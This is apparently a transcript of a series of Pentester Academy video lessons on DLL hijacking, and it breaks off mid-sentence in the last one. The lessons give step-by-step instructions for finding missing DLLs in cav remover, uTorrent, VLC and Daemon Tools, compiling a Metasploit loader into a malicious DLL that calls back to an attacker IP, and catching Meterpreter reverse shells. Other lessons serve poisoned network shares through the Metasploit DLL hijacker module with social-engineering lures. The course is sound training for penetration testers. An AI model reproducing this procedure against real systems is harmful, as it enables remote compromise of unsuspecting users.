Hello all, welcome to the network pen testing course at Pentester Academy. Now in this video, we will look at DLL hijacking basics. So DLLs, or dynamic link libraries as they are called, is the most common way by which Windows applications share code. Now the whole idea behind DLLs is to make applications more modular. So how does a DLL work? So here is a demo DLL, and this DLL would have many functions which might be implemented inside, some of which would be what are called exportable to the outside world. Now exportable really means that applications can go ahead and call these functions by loading the DLL. Now there is an optional main function called the DLL main function, which a DLL implements if it wants to do any startup activity. Of course, this is optional and you can ignore it if you want. Now, apart from DLL main, depending on the DLL's functionality, there are other functions written in as well. Now, an exe typically loads a DLL from disk using load library and then finds the appropriate function it wants to run by using getProcAddress. So using load library and getProcAddress, pretty much DLLs are loaded in memory and their functions are made accessible. Now, if I were to broadly classify DLLs, I would classify them into system DLLs, which is provided by the Windows system. And these pretty much do all the bare bone basic functionality which most executables might require, such as the WinSock DLL, which gives basic internet connectivity such as send, receive, connect, bind, etc. And there are many other DLLs such as kernel 32, user 32, and so on and so forth. Apart from the system DLLs, the application developer himself might want to modularize his application and split functionality across multiple DLLs. Now these DLLs are what are application DLLs and typically ship with the application. Now the question arises, if an exe is going through the process with the help of the Windows loader to load and to find different functions in a DLL, then even before that, how does it even find the DLL? Now, this is where on Windows there is a default DLL search order. Now, this would begin with the directory from where the application is loaded, which is where the binary resides, followed by the current directory from where the user or whoever is executing it. And if it's not found there, then we move on our search to the system directory, the 16-bit systems directory, the Windows directory, and finally to all directories which may be listed in our search path, which, as all of you know, is an environment variable. Now, if an option called safe DLL search mode is enabled, which typically came in when DLL hijacking became very prominent, then the default order changes, and the key difference is that the current directory from where the application is run is actually put much later in the search than it was in the previous case. This of course manages to stop some DLL hijacking attacks, but definitely not all. So how would we go about finding vulnerable applications where we can do DLL injection? So DLL hijacking, I'm sorry. So the whole idea is basically when an application loads up, it is going to try and find the different DLLs using the search order which we just spoke about. Now in many cases, a target DLL might be completely unavailable or might be much further down in the search path. Now if a target DLL is unavailable for some reason, then it is trivial for us to go ahead and do a DLL hijack. In the cases that the target DLL is available but is much further below in the search path which we discussed, then as an attacker, if we manage to go ahead and store our malicious DLL with the same name somewhere higher up in the search path, then the application would end up loading our malicious DLL. Now for this demo, we'll be using a binary called cav remover, which is really a Kaspersky product remover. The original research on this was done by Astro Baby. You can read that link as well and get another perspective of how he solved it. So with this, let's actually move on to the demo. Now I'm going to be doing the demo on a Windows 7 machine. I have the cav remover binary in here. Apart from the cav remover binary, we need the sysinternals suite of tools, particularly procmon, which allows us to go ahead and monitor different events happening in different processes. So once you've downloaded the sysinternals tools and the cav remover binary, go ahead and run procmon. So looks like this one is already running. Let me close this. Let's restart. I'm going to remove some of the older filters which I had added for my own purpose. Just do a quick reset on the filters and do an OK. Now for people who've never used procmon, you can clearly see there are a ton of events. Now procmon goes ahead and displays all the events happening system-wide. These could be registry events, read-write file events, a ton of them. And it shows you these events, when they happened, the binary which made them happen, and a lot of information. So procmon will actually come in handy to do dynamic analysis, in which when our binary runs, we can actually figure out the different DLLs it is trying to load, and then we are going to zero down on when the binary fails to find a DLL in its different search paths. So let's do this. And as you can see, procmon has like a ton of events. Let me just restart the application a bit. It's expected to have thousands of events, by the way. Now let's open cav remover and let's hit accept. Presented in this screen where we can now remove this product. So let's go back in here. Let's add a filter. Now let's go ahead and choose the actual binary using process name. Let's do a process name is, and then select cav remover. Here it is. Add the filter, apply it. Now all the events which we see inside procmon are from cav remover. But as you can clearly notice, there are tons and tons and tons of these events going on. The one which we are interested in, of course, is related to the DLLs. And this is where we need to only look at events where the path contains a DLL. So let's go ahead and add this. Let's say path contains DLL. Let's add this, apply the filter, and now we see a bunch of them. Now, if you notice, in a lot of cases, we see successes, and we find that in some cases there is a name not found. Now, this is very important. The name not founds are really the ones where your binary is trying to load the DLL but couldn't find it in one of the locations it expected it to be in. So let's actually now apply an additional filter on result and say result contains name not found. So add this filter, apply it, and now you would actually find only the ones for which the name was not found. Fantastic. You can see a couple of them in here. Cav remover, of course, has been tried in various different places. Now, if you recall, the program ran from the desktop, and from an attacker's perspective, it's very easy to package a DLL in the same directory as the binary and send it to a victim, right? This is also very easy when you look at installers and stuff like that, which could be packaged together. Now we can clearly see that we tried to go ahead and do a create file call on cavremover.dll. You can double click this event, and if you notice, really we tried to actually do an open on it. Desired access is really read, and we found that the DLL was nowhere to be found. So this seems to be a very good candidate. So what if we could create a simple malicious DLL called cavremover.enu.dll and just do something very basic in it and put it in the same directory as cavremover and start the program? What would really end up happening? So let's go back to our VM, or rather our slides. Now we could use different programs to create a DLL. I'm using the simplest one. Now if you recall, I said that when a DLL is loaded, DLL main is first run. Now if you just go to MSDN, you can find this sample code. I've just picked up something from ExploitDB, and in this case DLL main in turn calls DLL_MLL, which just puts out a message box. Now keep in mind that from our perspective, the only important argument to DLL name is the FDW reason. And depending on whether you are being now invoked for the process attaching, detaching, or a thread attaching or detaching, you could do different stuff in here. So what I've done is I've taken this source code and I've put it inside my Kali machine so that we can use it. So here is hijack.c, the exact same program. Let's now compile this using the Ming compiler into a DLL. So this should be simple. -o. Let's call this hijack.dll for now. And this is basically a shared library. So let's run file on this. And we can clearly see it's a P32 DLL. Now let's run a web server on the same directory so that we can download this into our Windows machine. Let's refresh this. Let's download hijack.dll to the desktop. And let's close this application and let's restart the app. Now we can see hijack.dll, but before we do that, let's rename the DLL to cavremover.enu.dll. So let's go in here, click on it, change the name to cavremover.enu.dll. Right? Hopefully, I think I may have a typo. Cav remove. No, I think there's a typo. Cav remover enu. Yep, looks okay. I think the last one maybe may have been fine as well. Too many R's in there. So now let's run this, and there you go. If you notice, the DLL hijack message has come in. Let's click in OK, and that's it, right? Keep in mind, of course, that because you're hijacking some functionality, the executable itself might not run, right? And also at the very same time, not all DLLs would lend themselves to using DLL main in such a way. We have not done an actual code level analysis to check which DLLs do what functionality and what happens when they are loaded, right? So a lot of times you may end up getting crashes as well. So purely with this high level dynamic analysis, you might have to try different DLLs. Of course, we still have procmon running, so we have a lot of events which have been generated by this run. You aren't worried if you notice 6:23 is when we ended the first run, and everything below that is really of the current run. You could actually try different DLLs. You could try, let's say, the next one, msls31.dll. Let's try this one. Let's rename it. msls31.dll. There you go. We managed to do a hijack again. And this time around, interestingly, the application worked. Doesn't seem to be an important DLL. And just like what Astro Baby pointed out, you also have msi.dll, which you can try. So let me rename this to msi.dll. Let's run. You can clearly see, depending on where the DLLs are being loaded, the hijacked message is pretty much coming in different places, right? Okay, looks like the application is now stuck. Okay, there you go. You could also have places where you might see crashes, right? So for example, at the very top in here, msimg32.dll, right? I couldn't get this working with this one with just renaming it msimg32.dll. And there you go, right? The procedure entry point alpha blend could not be located in the dynamic blah blah blah, which means there are other checks happening, which definitely we aren't taking care of, right? So with this high level analysis, of course, there's going to be a little trial and error, but most of the times it does seem to work if you're one of those people who hate sitting with IDA and doing actual reverse engineering, right? Okay, fantastic. So hopefully you enjoyed this video, and in the next video, what we're going to look at is if we can now package Meterpreter inside our DLL, and we're going to learn some valuable lessons when dealing with DLL main. So thank you very much, and if you're enjoying Pentester Academy, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the network pentesting course at Pentester Academy. Now in the last video, we saw how you could go ahead and create your own DLL and ensure that the vulnerable application picks it up. Now in this video, we will look at if we can load Meterpreter via DLL hijacking using DLL main, and we learn some nice little lessons. Okay, so in the last video, if you recall, from DLL main we called the message box code, which popped up a very simple message box. So logically, why not just take Raphael Mudge's Metasploit loader and call that instead, right? So let's see what happens. So I have Raphael Mudge's Metasploit loader in here. Let me click on the raw version. Just do a simple. Hopefully I have internet connectivity in the VM. There we go. Let's open up the loader. Here it is. Now let me just add the requisite lines for DLL main. So let me open up our little hijack.c and just copy this out. You can use any editor you like. I'm a Vim guy, so I like Vim, but Pico, Nano, whatever works for you, feel free to use it. Okay, now in here, rather than call DLLML, I'm just going to call main, which is where the Metasploit loader starts, right? And one of the things I'm going to do is, as this is loaded within an application, doesn't make any sense to have arguments. So I'm going to go ahead and feed in the IP address and port number in here manually. Port 9000. And let me just swap the order of WinSock in Windows. There we go. Now let's make this into a DLL. Let's call this main.dll for now. Oops, there's WinSock in there, so we use the -l ws2_32 so that the WinSock library dependencies are given. Now let's check for main.dll. There we go. It's a 32-bit DLL. Now let's also set up Metasploit. So I've already set up an exploit handler for Windows Meterpreter reverse TCP. The IP is 10.10 and the port is 9000. Let me just hit exploit and go back in here, start my Python web server, and go back to the victim machine. I still have procmon running from the last demo. Refresh this. There you go, main.dll. Save it. Here it is. Let's put this in trash. Now the one which which was quite dependent in the last video was cav remover enu.dll, right? So let's use that. Cav remover enu. There we go. I don't need this anymore, so I close procmon. Now let me start cav remover and see what happens. Okay, something seems to be happening. And if I go to my Metasploit instance, awesome, I have a Meterpreter session. Okay, let's do a sysinfo. What was this? Let's do a PS. Oops. Let's do a question mark. Nothing. Well, looks like our Metasploit second stage was sent, but pretty much nothing happens from there on, right? Something seems to be wrong here. Now this is where what you have to understand is that DLL main isn't really for doing hardcore things, right? Now Meterpreter itself is a DLL, so from DLL main we are using the whole reflective loading strategy to in turn lose Meterpreter. Now if you look at some documentation, one of the things you should never ever do is probably go ahead and invoke another DLL from within DLL main. And this is really where a lot of heavy duty work unfortunately cannot be done, which is in the case of Meterpreter. So I have a link for this on the slides which you can have a look at, but the moral of the story is, well, unfortunately, even though it looks as if everything seems to be working fine, nothing is, right? This Meterpreter session is as good as dead for us. So in the next video, we will look at what is the right way to go ahead and run Meterpreter in this case. So hopefully you guys enjoyed this video, and if you have, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the Network Pen Testing series at Pentester Academy. Now in this video, we will look at DLL hijacking with an analysis using IDA-free. So in the last video, we saw that we cannot implement heavy duty tasks like running a Meterpreter from inside of DLL main. So what this means for us is we need to find another entry point into the DLL. Now keep in mind that you cannot just settle for just any entry point. We would have to find an entry point or function which gets called either automatically when the system starts, or rather when the program starts, or gets called with minimum user interaction. Now this is where we are going to statically analyze the executable and do some basic runtime analysis as well using IDA-free. Now keep in mind that as far as DLL loading and running functions inside of it are concerned, we need to recall of the dynamic duo, load library and get proc address. Load library allows a Windows executable to dynamically load a DLL, while get proc address helps us in finding the location of exported functions within the DLL. Now in any binary, a combination of these is what you're really looking for. The library would be loaded, we would have a handle to it, and then we would be loading different procedures and running them from the DLL. So let's take an example. We will take cav remover again as the example, and of course our favorite Metasploit loader from Rafael Mudge. So let's jump right in. So the first thing, of course, is to do a quick dynamic analysis using procmon as we've done before. Let me reset this. We should start getting a lot of events. Right. Now I'm going to be using Astro Baby's initial analysis of a DLL called msi.dll. So here goes. Now let me start cav remover. The application starts. I'm going to add very quick filters. First is the process name. This of course has to be cav remover. And then in the path, we are interested, let's do an ends with .dll, and in the result, of course, we want name not found. Now we have a bunch of possibilities in here. The one that I'm going to pick up is msi.dll, right? At the very end, which I can see in here, msi.dll. Now this is the same one which Astro Baby had picked up, but what he has done is he has done further analysis and at runtime looked at what is getting called using procmon itself. So look at his blog post and follow his technique. I'm going to use IDA free to go ahead and help us do the same thing. So I'm interested in msi.dll. Fantastic. Let me close propmon. I don't need it anymore. And now let me drag and drop the binary into IDA free. Going to go with the default analysis. Let's wait for the analysis. In the meantime, you'll actually find that in the imports table, we do not see msi.dll anywhere. Just look at this one here. This typically contains your system DLLs, and this no way contains msi.dll, of course, right? Now let's go to the strings window. And while the analysis is going on, let's search for MSI. You can hit an Alt T to search. Hit MSI. We see msi.dll. This is interesting. Let's hit Control T for the next one. Well, MSI is inaccessible. Here's a warning. This isn't interesting. It's just MSI params. This is interesting as well. MSI module was not loaded or already loaded, right? You can clearly see there is a spelling mistake as well. And well, this seems to be different API calls from MSI. Well, one of the ways in which we can always figure that out is typically in the Windows world, a lot of times the API name is prefixed, right? So we can see MSI in here. Okay, fantastic. Let's wait for the analysis to finish. It's still going on. Now, really, all we are trying to do is find different functions called from within msi.dll, and then finding at least one of them which is called when the program begins, or which is called when there is minimum user interaction, right? Like, let's say you're expecting the user to click a button or something like that in the GUI of the application, which he will do just to run the application. Then that would be a very good starting point as well. But ideally, one would prefer that the DLL should be loaded and this function should be called without any user intervention. Now, while this is happening, let's go to our Metasploit machine. I'm going to start MSF console just to save some time. I also have the Metasploit loader in here from the Git repository. I already see that. Let me make some few simple changes which you've seen in the last video. Let me locate the main function. Here it is. Now this main function name is what we are going to change, and we'll make this the name of the function which gets called from within msi.dll. Okay, we heard a beep. That's good news. IDA has done its initial analysis. I'm going to go back here, search for MSI. So here is msi.dll. Let me double click that so that I can find it in here. Right, we can clearly see this is in the R data section. Here is msi.dll. There is only one reference, which of course probably would be the place where load library would be called. So I double click that. I can see my load library call, and msi.dll is called in here. Let me quickly check if after loading the library there is a get proc address. Well, as you can see, there isn't anything happening immediately. Of course, there are other procedures being called. So let me go back and look at other places where this is referenced. Warning, MSI API is not accessible. Just one place. Okay, this is just here, just after the load library. So looks like if the load library call might fail, this could be a warning which is added. I'm just doing intuitive analysis. Of course, you'd have to follow along the code to see that. This is like a very first analysis, first run analysis. Hit Control T again. This doesn't look interesting. Control T again. And we have MSI module was not loaded or already loaded. Let's double click this one. This is called in a bunch of places, right? So if we right click and do a jump to xref to operand, you will get all the places where this is called, right? Let's click on the first one right here, right? And if you notice, looks like, of course, if the error condition isn't met, if we scroll up, we get a module handle to MSI, and looks like if that isn't the valid handle, we end up here to get proc address, and we get our very first one, which is MSI get product info A. Interesting. Let's hit an escape to go back. We're here again. If we click on the next one, we see another call, MSI close handle A. Interesting. Again, hit X while you have MSI module not loaded set. This loads all the places where this string is referenced. So we have MSI database commit, right? And you clearly see the trend right now, right? We have a bunch of calls which we have located within the MSI DLL, which the application is calling. This one is MSI view execute without probably looking at msi.dll itself, right? Keep in mind, at times, sometimes maybe the DLL itself isn't available on the system. Maybe they've forgotten to package it. So it's always a good idea to refer to code. You can always find msi.dll and play with it too. Let's hit X. Now, here is what I'm going to do. I'm going to go to my very first one, which is MSI get product info A. Let me apply a breakpoint here, right? So I'm going to apply breakpoint, very simple. That's going to be F2. And let me go back to the load library call for msi.dll. So I'm going to go back in here. Search for it again. And at the load library call, let me add a breakpoint, hit F2. Now, here is one thing I'm going to try. For load library, I'm just going to tell it that we have loaded msi.dll just to see what happens. Right, so let's start the process. So it says rebasing program. Let's wait for this. Okay, software breakpoint. That's fine. This is inside NTDLL. You can pass the exception to the application. This opens up. Click accept. And we've hit our load library call. Great. Let me hit the space button. This gives me the graphical UI. Now, what I definitely do not want is the MSI API is inaccessible, right? I don't want to do this. Just want to go ahead continuing so that the application thinks this DLL was available. So let me go ahead and execute instructions. We'll step over any calls to any subroutines. May go down, and if you notice, well, doesn't look like there seems to be a problem. It's probably because MSI might have been accessible. It might have been loaded later on somewhere. So let's continue with it. So there's nothing to worry in here. So now we've hit our second breakpoint. So this is fantastic. Looks like msi.dll was found somewhere later on in the search path, and you could verify this by using procmon again. And msi get product info a is automatically hit. So here's what I'm going to do. I'm going to go back to my Kali machine and rename main to msi get product info a. msi get product info a looks right. Let's continue with the application. Of course, I don't want an breakpoint here anymore, so let me just remove this breakpoint. Right. So a couple of exceptions which we can pass. Now the good news is we already have what we want, so we could just exit IDA. Could trash all these temporary files which were created. Now here's what I'm going to do. I'm going to go back to this machine and compile the Metasploit loader as a DLL. Let's call this msi.dll. Make this a shared binary so that it really becomes a DLL. Forgot linking against winsock ws2_32. There you go. Now I can do a quick check. Perfect. So let me run a quick Python server so that I can copy this to the victim machine. And in the meantime, let me set up Metasploit. Set payload, Windows Meterpreter reverse TCP. Set host 192.168.10.10. This is the attacker machine IP. L port. I think I needed to make some changes to the default loader. I'm sorry, I've forgotten. So of course this takes arguments and stuff like that, which of course isn't needed. So I'm going to remove these lines. I'm going to go here, 192.168.10.10. Don't even need the A to I actually. Let's say port 9000. Let me just quickly recompile this. Start my Python server. Go back. 9000. Hit exploit. Let's go back to the Windows machine. Let's download msi.dll. Save it on the desktop. Here it is. Let me drop it inside PE view so that we can see the export table. This should be the eData section. Click on export address table. And we can clearly see now we have MSI get product info A has been exported. Great. Now let's run cav remover. Click accept. You see this is kind of hung here. If you go back, there you go. You have your Meterpreter session. Fantastic. Right? Looks like some things still continue to work. Just the detection is stuck. So one could always go ahead, migrate to some other process before the user actually shuts or restarts this one. Right? Awesome. So as you can clearly see, how easy it was to go ahead and get Meterpreter using DLL hijacking. I would highly recommend reading Astrobaby's post. He's just used procmon, which is great as well because it saves you a lot of analysis. You can search through and figure out which function was called. If MSI.dll is found, keep that in mind, right? If MSI.dll was never packaged with the application, then procmon can't help you because there wouldn't be any subsequent calls happening. In which case you would have to go through a static dynamic analysis combination. And we'll see in a later example when we'll fool the application, not this one. From what I remember, it's uTorrent. We'll fool it to believe that the DLL is available and then look at what is getting called. So hopefully you guys enjoyed this video, and if you have, please do recommend Pentester Academy to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the Network Pentesting course at Pentester Academy. Now in this video, let's take up another DLL hijacking example and use uTorrent as the victim application. So you can download the vulnerable version of uTorrent from the exploit.db link. And after that, we will hijack the DLL in uTorrent. Now, how will we do that? Well, the process is pretty straightforward. Find the vulnerable DLL using procmon. And after that, we will use IDA to find the exported function which gets called when the application starts, and then we will create a Metasploit loader based DLL to hook it. So let's jump right in. So I've already installed the vulnerable version of uTorrent. Let me ensure that it isn't already running. Okay, great. Now the first step, of course, is to figure out the DLLs which it is searching for, right? So let me use our best friend procmon. Let's search for procmon. Here it is. Let's reset this. Now let me click on OK so that the events can start coming. Probably also a good time maybe to create a shortcut of procmon on the desktop. And now let's start uTorrent. So I've started uTorrent. Looks like it went into the background by default. Now it's in the foreground. Let's go ahead and now add the filters. So process name, clearly see there is a uTorrent, add, apply. The next step, of course, as you've seen before, is the name not found. So we have result is name not found. And of course, what we are really interested in is basically the DLLs. So change path ends with .dll. Let's add and apply. And here we go. So there seem to be a bunch of DLLs. The one, of course, which we are going to be interested in is which fails to load from the desktop, right? Which is from where we started the application using the shortcut. And we can clearly see that there is pretty much just one option. There seems to be another as well here, oci.dll, looks like, which tried to get started from the desktop. And here is one at the very top, which is plugin_dll.dll. Interesting. So this is the one we are going to use right now. And it hasn't been found. Great. So let's exit uTorrent. And let me actually open uTorrent from within IDA so that we can search for that DLL inside of it. So let me go to uTorrent. Seems to be only one binary, uTorrent. Just click on OK. This says some imported functions will not visible. Okay. This happened because the IIT is located in a non-standard section. This is always interesting because this probably points to the fact that there is some kind of a packing or something going on. And we can clearly see, we see UPX1, looks like one of the segments. Now what I would instead like to do is close IDA and just open this up in PE view. So let me go to my computer, C drive, program files, uTorrent. Let's look at all files, select uTorrent, look at it. And I can clearly see that the sections here are UPX0, UPX1, etc. Now UPX is a very, very popular packer, right? A packer typically compresses a binary and then decompresses it in memory and allows the binary to run. So of course it's going to be very painful if we have to do an analysis on the packed executable. Now the good news is UPX is a well-known packer, which means we can decompress the binary. So here is what I'm going to do. Let me go to the folder, copy the binary. The best part is there is this one file in the directory. Copy this out. Now I have downloaded UPX. You could just Google and download the Windows version of UPX. And I'm just going to paste this in here. Open a command prompt. Change directory desktop, UPX. Type in UPX. We get a bunch of options. The -D option is for decompression. So we can actually do a UPX -D uTorrent.exe. Hit an enter. And this is great news. We have the unpacked file, which pretty much replaces the packed file, right? A lot of malware use packing. Many a times the malware authors may even have their own customized version of UPX so that you just can't use the -D to unpack them. Okay, but this is good news for us. Now let's take the unpacked executable, throw it inside IDA Pro. IDA shouldn't complain now, and it doesn't. Fantastic. So if you notice, we have the complete decompressed code in front of us. Awesome. So let's wait for IDA to do the job. And in the meantime, let's set up Metasploit. So use exploit multi-handler, set payload to Windows Meterpreter reverse TCP, set lhost to 192.168.10.10, set lport to say 9000, and let's create our handler. Now I've already downloaded the Metasploit loader, and we'll shortly modify the source code of this one. Let's go back to our IDAPRO output. The whole analysis is done and we can see this here. So let's actually use the strings window to quickly search, hit Alt-T for plugin underscore DLL.dll. There it is. Let's see if there are any other occurrences. There's just one occurrence. Double click this one. Here it is, plugin underscore DLL.dll. There's only one place where it's referenced. And we can see that in here, right? Here it is, plugin underscore DLL.dll. Looks like we have a small subroutine here which gets called just after that. Let's go in there. We just double click and go in there. We can clearly see that there is a load library statement and there is a get proc address statement, right? Cool. So looks like this is really where we are loading this DLL and finding a procedure inside of it. Now, unfortunately, because the LP proc name is in ESI, and there's a bunch of stuff going on in here, doesn't look very easy to just get it by doing a simple static analysis, right? So let's do some dynamic analysis. Let me set a breakpoint at this location so we can start tracking as soon as the DLL is referenced. I'm going to hit an F2 and let me run this binary. Let's close procmon. I don't need it anymore. It's been a good friend. Let's run this. We have a software breakpoint. Let's pass it on to the application. This is typically okay. And we notice that we've hit our breakpoint. Here it is, right? So now let me step through the different instructions, right? And I would like to execute each one as well because we need to go inside the subroutine. Okay, let's move forward. Let's go inside the subroutine. Things look okay till now. We are moving towards load library. Okay, here is our call to load library. Now keep in mind that plugin underscore DLL.dll doesn't seem to exist, right? So we have to ensure that eventually we take this path and somehow fool the application. So let the call to load library go through. We should execute until we return from the current function. So I'm going to press the third one. And at this point, what you would notice is that the 0 flag has been set to 1. And after that, we are testing for it, right? A test EDI. So only if the 0 flag is, so let's move forward and I'll show you what happens. Of course, this test fails and it looks like we aren't going to do get proc address, right? But here is what we can do. I can set the 0 flag to 0 from the current value of 1. And now we are moving towards the get proc address. Fantastic. There we go. Unfortunately, this looks like some kind of a loop, right? Not that interesting. So let me go ahead and set a breakpoint here once we are out of the loop. Hit F2 and hit play. We've come out of the loop. And now we are moving towards get proc address. There you go. ESI, if you notice, should contain the proc name. Let me just hover over ESI, and we can clearly see that ESI is referring a string called hook underscore startup. Fantastic. This is really the proc name which gets loaded, hook underscore startup. So I'm going to exit IDA. My job with IDA is done. I'm going to go back to my attacker machine, open up main.c, go to the main function and change the name to hook underscore startup. I'm going to remove the check for command line arguments, and I'm going to go ahead and modify this to 192.168.10.10 and this to 9000, right? Just so that the compiler doesn't complain. Let me do this. You should have followed previous videos just to see the warnings. I686 cc main.c -o plugin underscore dll.dll. This is a shared one, and we have to also link against winsock. Let's start our Python server in here. Let's wait for the server to start. Let's go back to our Windows machine, start IE, hit that URL, copy this to the desktop. And now let's execute uTorrent. It isn't running from here. Let's run it through the shortcut. You can see plugin underscore dll.dll in here, and nothing seems to happen. But if we go back to the attacker machine, there you go. We have a Meterpreter session waiting for us. Perfecto, right? So you saw how it was possible for us to go through the whole analysis of uTorrent, find that plugin underscore dll.dll was something which is searched for, and then figure out that hook underscore startup is basically one of the procedures which is called at init. So that's all for this video, and if you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the network pen testing course at Pentester Academy. Now in this video, we will look at exploiting uTorrent via a network share. So in the last couple of videos, we had seen how to find the vulnerable DLL name and hijack it to get Meterpreter. Now why not try and automate a lot of this using Metasploit? So this is where Metasploit has a fantastic exploit module called WebDAV DLL Hijacker, which basically creates a network share, and using that we go ahead and exploit the vulnerable piece of software. So let's jump right in. Let me go to my Metasploit console. It takes a little bit of time to load, and hopefully by now you guys have a great amount of command over DLL hijacking. So the module in question is WebDAV DLL Hijacker. Let's wait for Metasploit. Use exploit Windows browser WebDAV DLL Hijacker. Let's look at the different options. You would have to go ahead and set the extensions to the right one. So in the case of uTorrent, the extensions are torrent and BT search as an example. So you can do a set payload Windows Meterpreter reverse TCP, set extensions uTorrent BT search. Let's just verify that. Torrent and BT search, my mistake. Set our host. Set our host to 192.168.10.10, the attacker machine. And pretty much after that, we can hit exploit. So now let's go on the Windows machine and start an access to a network share 192.168.10.10. Let's wait for the share to open. There it is, the share has opened, documents inside of it. And we can clearly see two documents with this name. Of course, in the case of uTorrent, you could have more interesting names. I'll just ensure uTorrent isn't already running. And now let's open these up. If you notice, it's waiting. If we go back to the attacker machine, we already see a ton of stuff happening. And there you go, we already have our Meterpreter session. Right? Fantastic. So this is how you can use Metasploit to go ahead and attack these executables which may be vulnerable to DLL hijacking. I think this was a really short demo. Of course, I would highly recommend you go through previous videos and ensure that you understand the process of DLL hijacking before you use any form of automation. So hopefully you enjoyed this video, and if you have, please recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the network pen testing class at Pentester Academy. In this video, we will continue with DLL hijacking and take VLC player as an example. Please download the vulnerable application and install it inside your virtual machine using the exploit DB link provided. The vulnerable app is on the exploit DB page. So let's jump right into our VM. Let's close the annoying demo. Now what I've actually done is I've installed the vulnerable version of VLC, and I've created a folder called DLL Hijack VLC, inside which I have an MP3 file. So what I want to see is when I run the MP3 file, if VLC player is going to be searching for any DLL in the current directory, right? So let's check that. Let's start procmon so that we can collect all the events happening on the Windows system. And let me go ahead and run this. I'm just going to probably mute this so that you don't have to hear to the music. And here we go. It's running, right? Let's close this. Let's go back to procmon and add some filters. Let me add a quick filter. Now I'm going to do a little bit of shortcuts. All I'm bothered about is basically if the path contains the vulnerable folder which I have with me, right? DLL hijack VLC. DLL hijack VLC. So let's add this, apply it. Of course, we have quite some many results. So I'm going to do result is name not found. Now, if any of this is unusually weird to you, please go back and refer to previous videos which were created, right? Now, if you notice when I do this, I only get hits from two binaries. Let's go ahead and just include the ones which we can see from VLC. You can right click and just say include VLC, and there you go. Automatically, of course, the filter is updated as well, and we can clearly see that the DLL which is being searched here is wintap32.dll, and if you read the exploit DB page, this is the DLL which can now be hijacked. So let's go ahead and do the hijack. So I'm on my Kali instance, and let me first change my IP address to be on the same range as the victim. And then let's start MSF console. So what I'm going to do is, just like in the last video, use the DLL hijacker module to create a network share inside which we can have MP3 files and with which we can hijack VLC. Let me go ahead and reset the filters and close this. We've already done our analysis. Just want to ensure I don't have VLC running anywhere. Looks okay. Let's wait for Metasploit to load. I hope you guys are having fun with the DLL hijacking videos. This is a very interesting concept and can even be used for stuff like privilege escalation, as we'll see in later videos. Okay, so let me quickly search for DLL hijacker. Let's probably make the font bold. A little bigger probably. Maybe not. This seems better. Or probably not. Okay, this is a lot more better. Let's just go ahead and use this, the DLL hijacker module. Show options, ton of options. This is the base name, set base name to rock music. And set the extensions to MP3. And then let's set the share name to free music. Let's hit exploit. So the server seems to be started. Let me go back to my Windows VM and let's connect to the share. Of course, you could send this through some form of social engineering to the victim. And let's wait for it. Share opens up. We see there is a free music share. Here is the rock music file. We run it. Nothing seems to happen here. But if we go back to the attacker machine, we see that we have a Meterpreter instance. Now, if you actually go through the log files, what you would actually find is that WinTab32, just as we discussed, is what is searched. Now, because Metasploit is going ahead and simulating this network-based file system, it actually gets the request back for the specific DLL which is being searched, and we can clearly see that once it finds it, it can send out its own malicious DLL, which would be loaded by the application and run. So sessions-l, and let's do a sysinfo. There we go. Fantastic. So that's all I had in mind for this video. You clearly saw how we could go from a vulnerability to exploitation with the analysis involved in just a few minutes. Hopefully you've enjoyed this video, and if you have, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the network pen testing series at Pentester Academy. Now in this video, we will look at exploiting daemon tools via DLL hijacking. Please download the vulnerable version of daemon tools from the exploit.db link provided. The app is available. I've installed this application inside my Windows 7 system, which is here. I also have my Kali machine from the last video. So let me kind of start afresh. So let me start MSF console while we are working on the app. So in the case of daemon tools, let me create a new directory and let's call this DTools. And inside this directory, I'm going to create an MDS file. So let's open Notepad. And I'm just going to type in some gibberish. This is probably supposed to be like a playlist file. Sorry, this is supposed to be some description file for daemon tools, but we really aren't bothered simply because all I want is for daemon tools to run from within that directory. So let me call this demo.mds. Save it, close Notepad, and if you already see, Windows has recognized that as a daemon tools file. Now let's start our friend Procmon as we've done in the last couple of videos. And by the way, if you have no clue what we are doing, please go back and watch previous videos on DLL hijacking. So let me try to run this file. As expected, daemon tools fails to mount it, which is fine. But let's go back in here, go to tools, then go to filter, apply a filter, and the path should contain DTools. There's a quick way of doing this. We see a lot of possible results. So let's set result is name not found, apply, and we can clearly see we only have one match in here at this point, and the DLL which we see is being searched is the MFC80loc.dll. So this seems to be the vulnerable DLL. Fantastic. Now let's use Metasploit to do auto exploitation of this scenario. So let's go back here. Let's search for DLL hijacker. Let's use this module. If you look at the options, the first thing is the base name. Let's set base name to, let's say the matrix. And then let's set the extensions to MDS. And let me set the share name to free movies. Let's hit exploit. This sets up the share. Now I can go back to my Windows machine, access the share, free movies, find the matrix in here. Maybe I want to load it and watch it. And if we go back, here is your Meterpreter session. If you look at the trace, you see that MFC80loc is really what is searched for, just as what we had expected. Let's do a sessions-l. Let's connect to the session. Fantastic. And there you go, DLL hijacking DTools. And as I mentioned in the video early on, if you're jumping into this probably in the middle, please go back and watch the DLL hijacking videos to fully understand what we've done here. Now I'm slowly trying to get you guys kind of, galloping, so that now you know how easy it is to locate binaries which have a DLL hijacking vulnerability. So that's all for this video, my friends. If you're enjoying your time at Pentester Academy, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Network Pentesting course at Pentester Academy. Now, in a previous video, we saw that it was probably not possible to go ahead and run the Meterpreter DLL from inside of DLL main during DLL hijacking. In this video, we are going to look at an alternate technique used by the Metasploit framework which makes this possible. So what is it? Well, we are still strapped with the limitation that we cannot load a DLL, which in this case would be the Meterpreter DLL, from another DLL's DLL main. However, there are other activities which we can do, like calling APIs to create processes, write memory, and a bunch of other things. So what Metasploit's implementation does is that it creates a DLL main, which it's going to use after the hijack, and then creates a new exe in suspended state, copies the shellcode inside of it, and then goes ahead and runs it. So let's look at Metasploit's implementation. Now I've given a link in the PDF which you can click. This is the directory and looks that HD himself authored this. Now if I look at template.c, here is the code I would find, and we can clearly see here is the DLL main, inside which execute payload is called. Execute payload is defined here below, and you see what he's doing. Is he creating a process, putting it in suspended mode, right? This is so that the process still isn't pretty much running, it's in suspended mode. And then he goes ahead and allocates memory inside the process and writes and copies the shell code into this new process. The process he's using is run DLL32, which we've 